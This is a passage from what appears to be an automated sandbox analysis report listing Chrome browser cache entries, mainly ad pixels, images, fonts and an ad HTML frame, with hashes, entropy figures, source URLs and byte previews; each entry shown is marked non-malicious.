Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 260

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 261

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 262

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 970 x 250, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	17192
Entropy (8bit):	7.482450703523413
Encrypted:	false
SSDEEP:	384:G8bygBLbqUgNX8BSHqwai/fffr2xq4pwpjjKidNi/:zBcqBSHfNjXVlRnI
MD5:	BF617F12941218EF6760C7095AE6C272
SHA1:	77475E56D2F3CD42FD9F4E301C19E76D956BC10C
SHA-256:	FBC53DC6D95EAA36041E47CE430910A98F5E393BD671436B7685C7CF361226AC
SHA-512:	F6C7FBCF07EEE8AB7ED9BC1FFA5460E9B9EEB2DB11591553CE1C754B8A1A96021D82FFAAA6BD658406D30DD2B4DE9FD305A8565970033C24B273B48192BB9AC4
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/11778604948800383788?sqp=4sqPyQQ7QjkqNxABHQAAtEIgASgBMAk4A0DwkwlYAWBfcAKAAQGIAQGdAQAAgD-oAQGwAYCt4gS4AV_FAS2ynT4&rs=AOga4qkAaLVHOOPz_bastxbvDcE70OBe7Q
Preview:	.PNG........IHDR.............N#N6....PLTEv.4.....L...TTT&&&.........'''SSS..RRR...w.5......u.3v.2v.5........x.4.....x......:::.........Q.....................nnn***...xxx...!!!..............................XXX............sss.....i..{...ccc...............4....8{{{..................q...............^^^HHHJJJ.....`.........```..................\|.?..Y..L..........x.9........kkk222PPP...........hhh..E......UUV......EEEMNN..............7.............5........AAA....A....A......v.4.......Y.+.......>.h.3....%.....===........=666...........V....:w.2......-....p...7.K......................_.k....g....).E.G......K......y.5.~..\[[.2..7.>........-........+..b...%SVP.`.......{.P...u....l....r......QTg.......M.......^UK........i..cA@?%......zTXtRaw profile type APP1....ePI..0....}..,}.iST.....8u..F.=...$.Z.u[..=..V.......1%0.,3.)8.E.D.....~..#.R../..1u.(G.....'U8A......`A.V.2q&`d6.9....\|....Q.....:....fGx...Hg4q.

Chrome Cache Entry: 263

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 264

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 265

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 266

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	42
Entropy (8bit):	2.9881439641616536
Encrypted:	false
SSDEEP:	3:CUXPQE/xlEy:1QEoy
MD5:	D89746888DA2D9510B64A9F031EAECD5
SHA1:	D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
SHA-256:	EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
SHA-512:	D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........D.;

Chrome Cache Entry: 267

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=kkabdqbbSw6jVFe-wq1F4Q==
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 268

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=kadam&google_push=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 269

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 270

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 600 x 314, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3360
Entropy (8bit):	7.6743461321785915
Encrypted:	false
SSDEEP:	96:4JFCnqNZnERobhNaSgjXxFF14fCOLfcNCV8J1D1:sCqbnS4Nkt1BAFVWf
MD5:	406843D17B7D22C28CCD59A5D4F2C8F2
SHA1:	664B0283F3C8FF53F568992C9C4168A687C6FF23
SHA-256:	9E4848C58442739631BAC6B708A30BD9A7F642C6BAAB8172D608B1403EACC482
SHA-512:	4A2671F00DF1913237FF728CF6147FFC2DE03FB1E1B7E20555B7F7A461775B48D919E47B44D5FE03EED5AF4BB5B6A7D85D02EDAF460F23F0452BF43B0AF0CF8F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...X...:......l."....PLTE....p..o.....o...........(o.W..r..p........u..m....5.........q......./z.....X.....s..k..k..m..c..I..i..L..r..i..V.....e..X..u..v....o..._..p..]..........8s....t....{......S....$\.....d....d....2h....Q..A.....T...]..Ly.0j....{..H.?..i....\|.....9.g..]..@{.j......E..Y.I....IDATx....[....am. a."aH..a...RHB.RHIJ.6.v...#..`dlC..>7).5..~3.K.0......................................................................................................................g.>i.._cM....A`.;e.0...#..[.2.E<.....F...`!..........-.....a...;.\>,..<.+...h..]c.\|c.....V?...OG....sjW.\|g,...O..{W.o7..:..Fn,..{.h.qZ>.....M....,.u.o.#...e.............F3.J.t...f..........zTb?.\|...q..;q{2...V.....:..........5...nX...T..7A=.f...fm3.Q.Z.mY..?...rE.....-...d$G..05.v........Z..nxsSu..omyV..`....}h..p...(.......#.to_8.6.......?.......v..*nm?v.....92..<>2,7..S.,.S.=..y......O\.1CO....7..L.d@V..{.8.......T.\.T{..g.ui.)M.%........{..-x.

Chrome Cache Entry: 271

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 1200, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	6633
Entropy (8bit):	6.943099581411173
Encrypted:	false
SSDEEP:	96:YEjw2sjYKw1WIL2KMLgIk6AtTxgA6/e46arFDRlgj2P6uXfi1yMjCFEiHA:XsjUIC0N0Zox6WFDRGj2P66eTiHA
MD5:	E78B7BD4E07BFD2389ECB0C9BAF2D9C4
SHA1:	6EB12C9E3555267C211970C13B81C83718E0ABDE
SHA-256:	E4EF38A672DA0D57953164EE7D4BFD38E1C26789432C0A82B365AB16966CDAEB
SHA-512:	E175747221715C2F9F72F630BE044C836BE1D3063F8CF712BA6403BD4173BCDE7ED0950834F10BA46CEB8FC8E9ACDFE55620DC0A9C8376E274F9DF59E99E6949
Malicious:	false
Reputation:	unknown
URL:	https://upload.wikimedia.org/wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png
Preview:	.PNG........IHDR...............C.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTEQ+..........xZ...]:.cA....r....T/......hG.......]9...y\..........iH....R,.w...._<......~b....V2......mM.....{....`=....d..........nN.............i....Y4......rS....S-......cA...l....Y5......sU.........n.....\|......gF....n....[7.........p......k.R-.......^;...._<.lL.vX.d..........}.U0..............eC.....T..j......Z6....rT...i..........a?.........V1....tU....{^.....................eD.......pP....W2.}`.....s.....x..jI.tV.......X3.h...a>.....~....kK..........wY...[7.....o...nO.b@......oP.\|_...u..pQ.f....\8......uW....lK...r.....\|...w.fE...qR.....g...jJ........{_.....t.....z...........wZ.q.........y.......hF....y[.}a....z].dB..L`....bKGD.f.\|d....tIME......)-u......IDATx......u...gHRn.I..A@QT.%....$...jec.(...h."..x#...eu]tM1W..M.T.....,[..2..l.u....5.pD.{:....}>..\|...y...3.=gR.........

Chrome Cache Entry: 272

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
Category:	downloaded
Size (bytes):	48236
Entropy (8bit):	7.994912604882335
Encrypted:	true
SSDEEP:	768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
MD5:	015C126A3520C9A8F6A27979D0266E96
SHA1:	2ACF956561D44434A6D84204670CF849D3215D5F
SHA-256:	3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
SHA-512:	02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
Preview:	wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...\|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2.........C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.

Chrome Cache Entry: 273

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 727 x 380, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11489
Entropy (8bit):	7.928741117538931
Encrypted:	false
SSDEEP:	192:KVKggNVkMIW1fprYVczzz5jknVAAi1fTbg1fV8shSsmdYI6TbmvkvxD:sMVkMJxfzf5InVniiThTcOxD
MD5:	4A3A02542BBD6D260AFD680F4EB9F0CE
SHA1:	C368D3DCA48E4821725DBA39220ABF4D388BB519
SHA-256:	55B64C16025EA72D28B1023DA02FBCD12A1ED0B97D60E39E6BFEF15B506758FD
SHA-512:	2FC2CE8CA52EC44E4B2B8151C6CA5F71732E9EBD02B6546D47F3F9F43D387DB3E4C2EAACCA6EE74551C21A01D172425E0D97D1A250B52C77C3492DD83A1BAAF6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......\|.....3cg....uPLTE3.&..........x...V.K...}.t.......^.T.............v.m=.0..........E.9S.HI.=\.Qo.f.........i.`...........X...`zTXtRaw profile type APP1..X..[.$..E.{...=..rHQ2.0lc.........0....]......................._._..}.o.....,YEy3...K......yWx3...o_s$.t.......3z.y..9 ..q..mk.RL..X>R....._.JR.3.....O]..Zg.=.\{].U......^.\|&..&.]..H....^2.....e.0N..q....>..r....'...?.\|..{.s@T:......>.:f..<......:.. e._7...v....+..O.=.<.+Ys{.M..\|r^.y.<J)RJ>E8.p.\|.$..:....;...a,....wGyr.F.>((.c.R.1~s.............'V2......".;..1BE.,....\|..[....&B._5.JL..U.....&..rn._..J.g.....2...P...K^...5...g......3....>.......+9.1/fW.w..V.0..k....0f...O.3.W....vX.JX.J..>z?..6gP:..mV..6S.*.5goP...d...!.}..U..m.[...w....;....t..)..!> .q..~N....Pk.l.....%..5..c..GsmG....V+....{q......o..W.I.Vt,tEu...cio\...........6....V..L.^vY..K.4....N...d.S..~.0)X..D.v...W&-......?.GG[.....U..h.$?.......^.r.L6@u..u.j=s.}Fe....K..&..n^u.`...

Chrome Cache Entry: 274

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1572)
Category:	downloaded
Size (bytes):	47988
Entropy (8bit):	5.336036748275791
Encrypted:	false
SSDEEP:	384:f0aOClrtSZvbqY490nVg3Of0wt32vSqY49NnSzdOhqqt5Iv0qY49HnQd+OWJ3tW9:eHjMuOA8IgbXdUw/rVfQy
MD5:	A729431A3D4C5F20E23870661D5DB434
SHA1:	ADCCCD8FFAC2C671B790463918E59AB652CDBC6C
SHA-256:	3ACC25211C6A9576E42AFCC0AEA1BDA7431D716D31D92B0B800293276BCABC9E
SHA-512:	173DDEB1ECBF38AB4E384078E188B459C88FE5DB1D4D4EE1AC0C0635AC9CC298B290F7DE417F8D534DCFABED3D3C87868BEB37B7600028718D517A6FC299FEC5
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.googleapis.com/css?family=Baloo+Paaji\|Open+Sans:300,300i,400,400i,600,600i,700,700i"
Preview:	/* gurmukhi /.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVan3qRrgBg.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0A01-0A76, U+200C-200D, U+20B9, U+25CC, U+262C, U+A830-A839;.}./ vietnamese /.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanbqRrgBg.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./ latin-ext */.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanaqRrgBg.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304,

Chrome Cache Entry: 275

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	41970
Entropy (8bit):	7.952243493903504
Encrypted:	false
SSDEEP:	768:QYRIdacymFQ0cVzWw5DN81+yV7OHML2fWcOKmJgF7QvIeySrCk/8t3f+qZ4C:lGOmFQ0ch5DNq7OHVOyv8PHWEI3f74C
MD5:	E9681E558391DD7368AC7E0828FFFE77
SHA1:	A0B030B8914A2DA1F155DB53EFEF5E56EC348148
SHA-256:	A57F6E4555D516B7A1BFF5D1EE889728561AD2E4D5275B50A462914315DD9CF5
SHA-512:	BEBFDA119694BA8AEA8A9177C664C78399C94995CBDB33E610B562DC29B19176E30AE0F6F24DD4E7837D16369F1A608C6672EB506A7877B3BDB575C59EEBA9FA
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/8815001114601639138/14763004658117789537
Preview:	.PNG........IHDR.......t.....5Ve....PLTE.......)..'..*........+.........&.....%....~'.y...<........x#...n..t....\....L..dD.z%.q..s%....S....d .L..y'.wZ.x..f...t.c ..........t$.K$....m#.F(..{......Z..Q...S.U.....c..q"......D........g!.s#..`..P.T..@......A..p..i=.H..R.._......z......G..W..o.]".J".K....^.....\..A..=......S..f.....D..h..I.b.....{..^.rP.~.f...~<.vK.mB.d.U>.Z/.Q#.z.mB.d$..]..o.n=.{J.=..l.<..s`.^8..o.p..v.O0..m.sZ.`C.WB.U(.m0.J-.H6.pW..eA.M....eW.3.......\-....}v...3..:..gW.,......... .IDATx......^8..@7\|..`... ."C;.h.d(..$mY$-Q.EJ.......&..,.....x.4..f.<.2..s........Q<...$....}...L.D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H

Chrome Cache Entry: 276

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	233666
Entropy (8bit):	6.224373448960184
Encrypted:	false
SSDEEP:	3072:BjaLzNLZS2FSV3dwvBC1yIyvyITLOIL/aai6gpZlwyRya+/WCbppZlGyPhy+:Bj2zNM2FSrwvBC1hKzuJwGipJGghx
MD5:	311162A2769F467D9B25B925DFC7B5AF
SHA1:	A7BF288CDE1FCF0EE0454EE1D9F7E990E178787F
SHA-256:	6F3CBDF113BDAEA88BD32F52AA0F2A120D5615A1609F256C13809A0744841F0B
SHA-512:	97736BC7BFF3FBF66001693CEF230E2B20CF9C4E1B98723D77CD4B8F38E3E88907D111C3558AA12D7556690C601685EB25E0C60E80711305967A172196FA919F
Malicious:	false
Reputation:	unknown
URL:	https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-9495854422341365&output=html&h=465&slotname=5441991148&adk=1388703591&adf=2999106894&pi=t.ma~as.5441991148&w=930&abgtt=6&cr_col=4&cr_row=2&fwrn=2&lmt=1730398767&rafmt=9&format=930x465&url=https%3A%2F%2Ftrksyln.net%2FError&crui=image_stacked&fwr=0&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1730398765225&bpp=22&bdt=3876&idt=2066&shv=r20241028&mjsv=m202410240101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=5363632696827&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=44&ady=909&biw=1017&bih=870&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C31088482%2C95344187%2C95335245%2C95345472%2C95345789%2C95345963%2C95345966&oid=2&pvsid=2973902258960805&tmod=55193809&uas=0&nvt=1&ref=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&btvi=1&fsb=1&dtd=2073
Preview:	<!DOCTYPE html><html lang=en><head><meta charset="UTF-8"><link rel="preload" href="https://www.gstatic.com/mysidia/35f2dd7cdd8ea7bef7dd50fca553a4a9.js?tag=engine/client_fast/client_fast_engine" as="script"><script>var jscVersion = 'r20241028';</script><script>var google_casm=[];</script><style>HTML,BODY{height:100%;width:100%;margin:0;padding:0;overflow:hidden;}#mys-wrapper{height: 100%;width:100%;overflow:hidden;position: absolute;top:0;left:0;align-items: flex-start;display:flex;justify-content:center;line-height:normal;}#mys-overlay{height:100%;width:100%;overflow:hidden;position:absolute;top:0;left:0;box-sizing:border-box;pointer-events:none;z-index:1;display:none;}.mys-wrapper A,.mys-wrapper A:visited,.mys-wrapper A:hover,.mys-wrapper A:active{color:inherit;cursor:pointer;text-decoration:inherit;}[dir=rtl] .flip-on-rtl{transform:scale(-1,1);transform-origin:center;}#mys-content{flex-shrink:0;position:relative;overflow:hidden;z-index:0;}</style><script data-jc="36" data-jc-version=

Chrome Cache Entry: 277

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
